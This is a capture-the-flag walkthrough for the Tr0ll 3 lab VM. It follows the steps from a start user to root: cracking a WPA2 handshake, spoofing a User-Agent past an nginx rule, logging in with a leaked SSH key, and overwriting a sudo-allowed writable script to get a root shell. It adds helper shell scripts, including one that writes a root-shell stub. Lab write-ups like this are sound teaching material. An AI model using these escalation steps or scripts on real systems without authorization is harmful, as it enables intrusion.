
Tr0ll 3 – Please don’t feed the Troll (Walkthrough)

This post is also available in: Deutsch

The third episode of the Tr0ll series from @Maleus21 is a classic Boot-2-Root VM. Our goal is to move through different levels of users and finally gain root privileges to read the flag from /root/flag.txt. The following writeup is the summary for my solution to achieve this goal.

Level 0: start

The credentials for the first user, start with the password here, are displayed on the console once the virtual machine has booted.

Tr0ll 3 - start screen

An initial port scan with nmap shows that only SSH on port 22 is exposed. That is enough, though, to work on the machine from our own host instead of the VM console.

basto@Malice:~$ ssh start@192.168.56.101
start@192.168.56.101's password: here
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

start@Tr0ll3:~$ 

In the home directory of the user start we find the two folders bluepill and redpill.

start@Tr0ll3:~$ ls -al *
bluepill:
total 12
drwxrwxr-x 2 start start 4096 Jun 18  2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start   18 Jun 17  2015 awesome_work

redpill:
total 12
drwxrwxr-x 2 start start 4096 Jun 17  2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start   17 Jun 17  2015 this_will_surely_work

The file awesome_work contains nothing but the URL http://bfy.tw/ODa. If we visit the given link, we will be forwarded to www.lmgtfy.com (Let me Google that for you) with the query “How do you make a hacker waste time”. So it’s pretty obvious that this clue is a dead end and was placed there as a joke.

basto@Malice:~$ curl http://bfy.tw/ODa
<html><body>You are being <a href="http://www.lmgtfy.com/?q=how+do+you+make+a+hacker+waste+time%3F">redirected</a>.</body></html>

As the story progresses, we are presented with similar information again and again, just to serve as a distraction. The machine lives up to its name and “trolls” us wherever it is possible.

The file this_will_surely_work in the redpill directory contains the string step2:Password1!. Our instinct tells us that these have to be the next credentials. But if we try to log in with the given information, we only receive an error message. Yet again, this is only a decoy.

First Clues

With the command find / -type f -perm 0777 2>/dev/null we list files whose mode is exactly 777, i.e. readable, writable and executable by every user regardless of their owner (errors for directories we may not enter are discarded). This turns up the first actual clues:

start@Tr0ll3:~$ find / -type f -perm 0777 2>/dev/null
/var/log/.dist-manage/wytshadow.cap
/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt
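
The find above only matches files whose mode is exactly 777. As an added example (not part of the original walkthrough), the following shell functions generalize that first enumeration step: world-writable files via a bit-mask match, and SUID/SGID files, optionally limited to those owned by someone else. Everything in it is standard find/sh; the function names and the script file name are my own.

```sh
#!/bin/sh
# Added example (not from the original writeup): the file-system enumeration a
# low-privileged user does first on a Linux box, in reusable form.
# `find -perm 0777` (used above) only matches files whose mode is *exactly* 777;
# the `-perm -MODE` form matches "all of these bits set", so it also finds
# files with modes like 666 or 4775 that the exact match would miss.

# enum_world_writable DIR
#   Regular files under DIR that any user may write to (others' write bit set).
#   -xdev keeps the walk on one file system so /proc and /sys are not entered;
#   drop it if /home or /var are separate mounts.
enum_world_writable() {
    find "$1" -xdev -type f -perm -0002 2>/dev/null | sort
}

# enum_setid DIR
#   Regular files under DIR with the SUID or SGID bit set, whoever owns them.
enum_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# enum_setid_foreign DIR
#   As enum_setid, but only files owned by someone other than the current user:
#   running those executes code with *their* identity, which is what matters
#   for privilege escalation (oohfun in the next level is owned by genphlux).
enum_setid_foreign() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        ! -user "$(id -un)" 2>/dev/null | sort
}

# Usage when run as a script:  sh enum.sh /
# (with no argument it only defines the functions, so it can be sourced)
if [ "$#" -gt 0 ]; then
    echo "== world-writable files under $1";            enum_world_writable "$1"
    echo "== SUID/SGID files under $1 owned by others"; enum_setid_foreign "$1"
fi
```

Run it as `sh enum.sh /` on the target; on Tr0ll 3 the first function reports the two clue files shown above, and the third one, run from the next level, reports oohfun.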

On the one hand, we can read the file wytshadow.cap in /var/log/.dist-manage/. It is a capture of 802.11 traffic: the EAPOL key frames in the excerpt below are a WPA2 four-way handshake.

start@Tr0ll3:~$ tcpdump -r /var/log/.dist-manage/wytshadow.cap
...
23:40:52.736808 Authentication (Open System)-1: Successful
23:40:52.742448 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown) 
23:40:52.743986 Authentication (Open System)-2: 
23:40:52.746024 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.748053 Assoc Response AID(1) : PRIVACY : Successful
23:40:52.750120 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.752176 EAPOL key (3) v2, len 95
23:40:52.753704 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.755752 EAPOL key (3) v1, len 117
23:40:52.757806 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown) 
23:40:52.759857 EAPOL key (3) v2, len 151

The handshake can be attacked offline with a wordlist; given the file name, the recovered passphrase is presumably the password of the user wytshadow.

The file gold_star.txt in the directory /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/ on the other hand contains numerous 10-character strings and serves us as a dictionary in our attempt to recover the password.

aircrack-ng -w gold_star.txt wytshadow.cap
aircrack-ng output with the cracked password

aircrack-ng spits out the correct password gaUoCe34t1 in a couple of minutes and with the new credentials we can now login as the user wytshadow:

start@Tr0ll3:~$ su wytshadow
Password: gaUoCe34t1
wytshadow@Tr0ll3:~$

Level 1: wytshadow

If we look through the home directory of wytshadow, the file oohfun immediately catches our attention. It is owned by genphlux and has the SUID bit set (-rwsrwxrwx), so running it executes the program with the permissions of genphlux. It is also world-writable, but that does not help directly: on Linux a write by a non-root user clears the setuid bit, so overwriting it would only give us a binary that runs as ourselves.

wytshadow@Tr0ll3:~$ ls -al
total 48
drwx------  5 wytshadow wytshadow 4096 Aug 22 09:21 .
drwxr-xr-x 10 root      root      4096 Jun 19  2015 ..
-rw-------  1 wytshadow wytshadow  297 Aug 22 09:21 .bash_history
-rw-r--r--  1 wytshadow wytshadow  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 wytshadow wytshadow 3637 Jun 17  2015 .bashrc
drwx------  2 wytshadow wytshadow 4096 Jun 17  2015 .cache
drwx------  3 wytshadow wytshadow 4096 Aug  1 01:50 .gnupg
drwxrwxr-x  3 wytshadow wytshadow 4096 Aug 22 06:40 .local
-rwsrwxrwx  1 genphlux  root      8566 Jun 17  2015 oohfun
-rw-r--r--  1 wytshadow wytshadow  675 Jun 17  2015 .profile

However, when we actually run oohfun, it just keeps printing iM Cr@zY L1k3 AAA LYNX:

wytshadow@Tr0ll3:~$ ./oohfun 
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX
...

If we examine the file content using strings, we can see that it contains the following line:

/lol/bin/run.sh -b 0.0.0.0

Unfortunately, we cannot modify run.sh: its parent directory /lol is owned by genphlux and grants other users only search permission (--x), so we can neither list its contents nor write into it.

wytshadow@Tr0ll3:~$ ls -al / | grep lol
drwsr-x--x   8 genphlux root     4096 May 22  2009 lol

sudo -l lists the commands the current user may run via sudo, and as which user. It is the first thing to check when looking for a way up:

wytshadow@Tr0ll3:~$ sudo -l
[sudo] password for wytshadow:
Matching Defaults entries for wytshadow on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wytshadow may run the following commands on Tr0ll3:
    (root) /usr/sbin/service nginx start

We can see that the user wytshadow is allowed to start the nginx web server service, which is what we are doing next:

wytshadow@Tr0ll3:~$ sudo service nginx start

A local check of the listening sockets with netstat confirms that the web server started: a new service is listening on port 8080 on all interfaces.

wytshadow@Tr0ll3:~$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN

However, we cannot visit the web service since all requests get rejected with a 403 Forbidden error message.

basto@Malice:~$ curl 192.168.56.101:8080
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>

To find out why, we open the default nginx site configuration in /etc/nginx/sites-ed/default. Right at the top we notice the following block:

# Default server configuration
#
server {
        listen 8080 default_server;
        listen [::]:8080 default_server;
            if ($http_user_agent !~ "Lynx*"){
                return 403;
}

The regex is tested against the User-Agent header, and whenever it does not match, nginx answers 403. Note what the pattern actually enforces: "Lynx*" is unanchored and the * applies only to the trailing x, so any User-Agent containing "Lyn" is enough; the intent is clearly "requests from the Lynx browser only". The file is read-only for us, so we cannot change the configuration, but with curl we can simply send a User-Agent header of our own in the expected form.

basto@Malice:~$ curl -H "User-Agent: Lynx Basto" 192.168.56.101:8080
genphlux:HF9nd0cR!

We can now use the credentials received in the response to log in as the user genphlux.

wytshadow@Tr0ll3:~$ su genphlux
Password: HF9nd0cR!
genphlux@Tr0ll3:~$
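
To make the nginx condition concrete, here is an added example (not from the original post) that reproduces the regex test with grep -E, which gives the same verdict as nginx's case-sensitive, unanchored regex match for this pattern, next to a corrected pattern anchored as ^Lynx/. The probe helper that queries a live host with curl is mine as well; host, port and all function names are assumptions.

```sh
#!/bin/sh
# Added example (not from the original writeup): what nginx's
#   if ($http_user_agent !~ "Lynx*") { return 403; }
# actually enforces. The regex is unanchored and the `*` applies only to the
# final `x`, so it matches any User-Agent that merely contains "Lyn".
# grep -E gives the same verdict as nginx's match for these patterns
# (both case-sensitive, both unanchored unless ^ is used).

# ua_allowed_original UA -> exit status 0 if UA passes the check as written
ua_allowed_original() {
    printf '%s\n' "$1" | grep -Eq 'Lynx*'
}

# ua_allowed_fixed UA -> exit status 0 if UA passes a check that really
# requires a Lynx-style User-Agent, i.e. the config line rewritten as
#   if ($http_user_agent !~ "^Lynx/") { return 403; }
ua_allowed_fixed() {
    printf '%s\n' "$1" | grep -Eq '^Lynx/'
}

# probe HOST:PORT UA -> prints the HTTP status the server returns for that UA.
# -A sets the User-Agent header (same effect as the -H form in the writeup).
probe() {
    curl -sS -o /dev/null -w '%{http_code}\n' -A "$2" "http://$1/"
}

# Usage when run as a script:  sh uacheck.sh 192.168.56.101:8080
if [ "$#" -gt 0 ]; then
    for ua in "curl/7.64.0" "Lyn" "Lynx Basto" "Lynx/2.8.9rel.1 libwww-FM/2.14"; do
        printf '%-35s -> ' "$ua"; probe "$1" "$ua"
    done
fi
```

Against the VM, the first User-Agent in the loop gets a 403 and the other three get a 200 with the credentials, which is exactly what the loose pattern allows; the anchored variant would only accept the last one.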

Level 2: genphlux

As always, we first take a look at the home directory of the new user.

genphlux@Tr0ll3:~$ ls -al
total 52
drwx------  5 genphlux genphlux 4096 Aug 22 10:09 .
drwxr-xr-x 10 root     root     4096 Jun 19  2015 ..
-rw-------  1 genphlux genphlux  273 Aug 22 10:09 .bash_history
-rw-r--r--  1 genphlux genphlux  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 genphlux genphlux 3637 Jun 17  2015 .bashrc
drwx------  2 genphlux genphlux 4096 Jun 17  2015 .cache
drwx------  3 genphlux genphlux 4096 Aug  1 04:03 .gnupg
drwxrwxr-x  3 genphlux genphlux 4096 Aug 22 09:22 .local
-rw-rw-r--  1 genphlux genphlux 1675 Jun 18  2015 maleus
-rw-r--r--  1 genphlux genphlux  675 Jun 17  2015 .profile
-rw-------  1 genphlux genphlux 5649 Jun 17  2015 .viminfo
-rw-rw-r--  1 genphlux genphlux  931 Aug  2 15:56 xlogin

The file xlogin is a saved Apache directory listing for /xlogin (served, according to its footer, by a local Apache on 127.0.0.1:80). Apart from the name of the file maleus, which is already sitting next to it, it tells us nothing useful.

xlogin

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /xlogin</title>
 </head>
 <body>
<h1>Index of /xlogin</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="maleus">maleus</a></td><td align="right">2015-06-18 00:27  </td><td align="right">1.6K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>

The file maleus, on the other hand, is much more interesting. It is an RSA private key, most likely an SSH key for the user of the same name.

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----

Now we try to log in as maleus with this private key. The SSH client, however, refuses to use a private key file whose permissions are too open (it reports an unprotected private key file), so we first have to restrict the permissions to the owner.

genphlux@Tr0ll3:~$ chmod 600 maleus 
genphlux@Tr0ll3:~$ ssh -i maleus maleus@192.168.56.101
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
maleus@Tr0ll3:~$

Level 3.1: maleus (private key)

Since we do not yet know the password of maleus, we cannot run sudo -l (it prompts for it). However, several files in the home directory deserve our attention.

maleus@Tr0ll3:~$ ls -al
total 80
drwx------  6 maleus maleus 4096 Dec 19 07:05 .
drwxr-xr-x 10 root   root   4096 Jun 19  2015 ..
-rw-------  1 maleus maleus   42 Dec 19 07:05 .bash_history
-rw-r--r--  1 maleus maleus  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 maleus maleus 3637 Jun 17  2015 .bashrc
drwx------  2 maleus maleus 4096 Jun 17  2015 .cache
-rwxrwxr-x  1 maleus maleus   37 Aug 22 10:04 dont_even_bother
drwx------  3 maleus maleus 4096 Aug  1 03:48 .gnupg
-rw-rw-r--  1 maleus maleus  145 Jun 18  2015 index.html
drwxrwxr-x  3 maleus maleus 4096 Aug 22 09:47 .local
-rw-r--r--  1 maleus maleus  675 Jun 17  2015 .profile
drwx------  2 maleus maleus 4096 Jun 18  2015 .ssh
-rw-------  1 maleus maleus 1301 Aug  2 16:02 .viminfo
-rw-rw-r--  1 maleus maleus  931 Aug 22 09:55 xlogin

If we look at the source code of index.html, it seems that the next clue is immediately revealed.

index.html

<html>
<body>
<img src="pic.jpg">
</body>
</html>
<!-- Wow, looking at the source code, you are truly l33t! The next step uses fido:x4tPl! >

Unfortunately, it’s not possible to login as the user fido with the given password. It seems as if the troll has yet again played with our emotions.

Likewise, we get misled by the file dont_even_bother. If we run it, we are prompted to enter a password.

maleus@Tr0ll3:~$ ./dont_even_bother

 Enter the password : 

 Wrong Password

A quick look at the strings contained in the file will reveal the required value:

maleus@Tr0ll3:~$ strings dont_even_bother
Enter the password : 
xl8Fpx%6

maleus@Tr0ll3:~$ ./dont_even_bother

 Enter the password : xl8Fpx%6

 Correct Password 

 Your reward is just knowing you did it! :-P

So it looks like we still haven’t gotten anywhere with this user.

The file .viminfo stores Vim's session state, among other things the command-line history and the contents of registers. Its register section contains the following excerpt, in which a password appears to have been yanked or deleted while a line reading passwd was being edited:

.viminfo

# Registers:
""1     LINE    0
        passwd
"2      LINE    0
        B^slc8I$
"3      LINE    0
        passswd

Level 3.2: maleus (password)

If we now run sudo -l with the password B^slc8I$ recovered from .viminfo, we get our next hint.

maleus@Tr0ll3:~$ sudo -l 
[sudo] password for maleus: 
Matching Defaults entries for maleus on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User maleus may run the following commands on Tr0ll3:
    (root) /home/maleus/dont_even_bother

As we can see, the user maleus has the ability to execute the file /home/maleus/dont_even_bother with the permissions of the root user.

We cannot do much with the current version of the file, but it belongs to maleus and is writable by us, and sudo executes whatever is at that path as root. So we overwrite dont_even_bother with a script that starts a new shell. (sudo falls back to running the file through /bin/sh when the kernel refuses to execute it, which is why the one-line file without a shebang works here; starting the file with #!/bin/bash avoids relying on that fallback.)

maleus@Tr0ll3:~$ echo "bash" > dont_even_bother

Next we execute the overwritten code with sudo permissions.

maleus@Tr0ll3:~$ sudo ./dont_even_bother
root@Tr0ll3:~# id
uid=0(root) gid=0(root) groups=0(root)
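
The weakness in this level is a sudo rule whose target the user can write. As an added example (not part of the original walkthrough), the following shell functions check sudo -l output for exactly that, and write the replacement script with a proper shebang. The sudo -l text in the comments is shaped like the output above; the function names are my own.

```sh
#!/bin/sh
# Added example (not from the original writeup): given `sudo -l` output, list
# the sudo targets the current user could tamper with. A rule like
#   (root) /home/maleus/dont_even_bother
# is only as strong as the permissions on that path: if the file is writable
# (this level) or its directory is writable (the file can be replaced), the
# rule is effectively "run anything as root".

# writable_sudo_targets   (reads `sudo -l` output on stdin)
#   Prints "WRITABLE path" or "REPLACEABLE path (...)" for each affected rule.
writable_sudo_targets() {
    # keep the "(runas) [TAG:] /cmd args, /cmd2 args" lines, drop the runas
    # part, split comma-separated commands, drop tags such as NOPASSWD: and
    # SETENV:, keep only the command path (first word)
    grep -E '^[[:space:]]*\(' |
    sed -E 's/^[[:space:]]*\([^)]*\)//' |
    tr ',' '\n' |
    sed -E 's/^[[:space:]]*([A-Z]+:[[:space:]]*)*//' |
    awk '{ print $1 }' |
    while IFS= read -r cmd; do
        case "$cmd" in /*) ;; *) continue ;; esac   # skip ALL, aliases, blanks
        dir=$(dirname "$cmd")
        if [ -w "$cmd" ]; then
            printf 'WRITABLE %s\n' "$cmd"
        elif [ -w "$dir" ]; then
            printf 'REPLACEABLE %s (directory %s is writable)\n' "$cmd" "$dir"
        fi
    done
}

# make_root_shell_stub TARGET
#   Overwrites a writable sudo target with a proper script (shebang first, so
#   it does not depend on sudo's fallback to /bin/sh for non-executables) that
#   starts an interactive bash. Afterwards run:  sudo TARGET
make_root_shell_stub() {
    printf '#!/bin/bash\nexec /bin/bash -i\n' > "$1" && chmod 755 "$1"
}

# Usage when run as a script:  sh sudocheck.sh --check
# (-n makes sudo fail instead of prompting if a password would be required)
if [ "${1:-}" = "--check" ]; then
    sudo -n -l 2>/dev/null | writable_sudo_targets
fi
```

On this machine `sudo -l | sh sudocheck.sh --check` would report WRITABLE /home/maleus/dont_even_bother, which is the finding exploited above; the REPLACEABLE case covers rules whose target does not exist yet or sits in a directory we own.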

Level 4: root

As the final step we can now use our root privileges to read the contents of the flag:

root@Tr0ll3:~# cat /root/flag.txt 
You are truly a Jedi!

Twitter Proof:

Pr00fThatTh3L33tHax0rG0tTheFl@g!!

@Maleus21